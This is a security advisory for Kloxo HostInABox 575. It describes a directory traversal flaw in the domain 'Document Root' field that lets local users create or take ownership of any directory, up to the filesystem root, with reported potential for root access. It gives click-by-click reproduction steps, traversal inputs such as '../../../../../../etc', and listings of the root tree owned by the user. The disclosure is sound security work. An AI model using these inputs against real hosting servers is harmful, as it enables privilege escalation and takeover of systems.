Kloxo HostInABox 575 - yet another symlink attack for local users
DESCRIPTION
Local users can create arbitrary directories anywhere on the filesystem via directory traversal when adding a new domain. They can also take control over any directory on the filesystem.
IMPACT
Local users could obtain root privileges.
1. Log into Kloxo 2. Click "Domains" 3. In the field labeled "Domain Name", type: example.com 4. In the field labeled "Document Root", enter: ../../../../../../test
Observe that the directory /test has now been created:
[user1@testing574 /home/user1]$ ls -l / | grep test drwxr-xr-x 4 user1 apache 4096 May 21 12:28 test
Alternately, the user can enter the name of an existing directory to take control over it, such as: ../../../../../../etc or even: ../../../../../../../../
which will result in this:
[user1@testing574 /]$ ls -al / total 288 drwxr-xr-x 25 user1 apache 4096 May 21 12:32 . drwxr-xr-x 25 user1 apache 4096 May 21 12:32 .. -rw-r--r-- 1 user1 user1 0 May 18 21:44 .autofsck -rw-r--r-- 1 user1 user1 0 May 18 21:44 .autorelabel -rw------- 1 user1 user1 1024 May 21 01:50 .rnd lrwxrwxrwx 1 user1 user1 39 May 18 21:44 aquota.group -> /proc/vz/vzaquota/00000020/aquota.group lrwxrwxrwx 1 user1 user1 38 May 18 21:44 aquota.user -> /proc/vz/vzaquota/00000020/aquota.user drwxr-xr-x 2 user1 user1 4096 May 14 10:38 bin drwxr-xr-x 2 user1 user1 4096 Mar 29 2007 boot drwxr-xr-x 2 user1 user1 4096 May 21 12:32 cgi-bin drwxr-xr-x 2 user1 user1 4096 May 13 06:40 command drwxr-xr-x 4 user1 user1 122880 May 18 21:45 dev drwxr-xr-x 56 user1 user1 4096 May 21 12:30 etc drwxr-xr-x 14 user1 user1 4096 May 18 23:38 home drwxr-xr-x 10 user1 user1 4096 May 13 06:38 lib drwxr-xr-x 2 user1 user1 4096 Mar 29 2007 media drwxr-xr-x 2 user1 user1 4096 Mar 29 2007 mnt drwxr-xr-x 2 user1 user1 4096 Mar 29 2007 opt dr-xr-xr-x 44 user1 user1 0 May 18 21:44 proc drwxr-xr-x 7 user1 user1 4096 May 8 02:46 program-install -rw-r--r-- 1 user1 user1 68088 May 13 02:24 program-install.zip drwx------ 4 user1 user1 4096 May 21 12:28 root drwxr-xr-x 2 user1 user1 4096 May 13 06:38 sbin drwxr-xr-x 3 user1 user1 4096 May 18 21:44 script drwxr-xr-x 2 user1 user1 4096 Mar 29 2007 selinux drwxr-xr-x 2 user1 user1 4096 Oct 6 2008 service drwxr-xr-x 2 user1 user1 4096 Mar 29 2007 srv drwxr-xr-x 3 user1 user1 0 May 18 21:44 sys drwxrwxrwt 2 user1 user1 4096 May 21 12:32 tmp drwxr-xr-x 14 user1 user1 4096 May 13 06:42 usr drwxr-xr-x 25 user1 user1 4096 May 14 10:39 var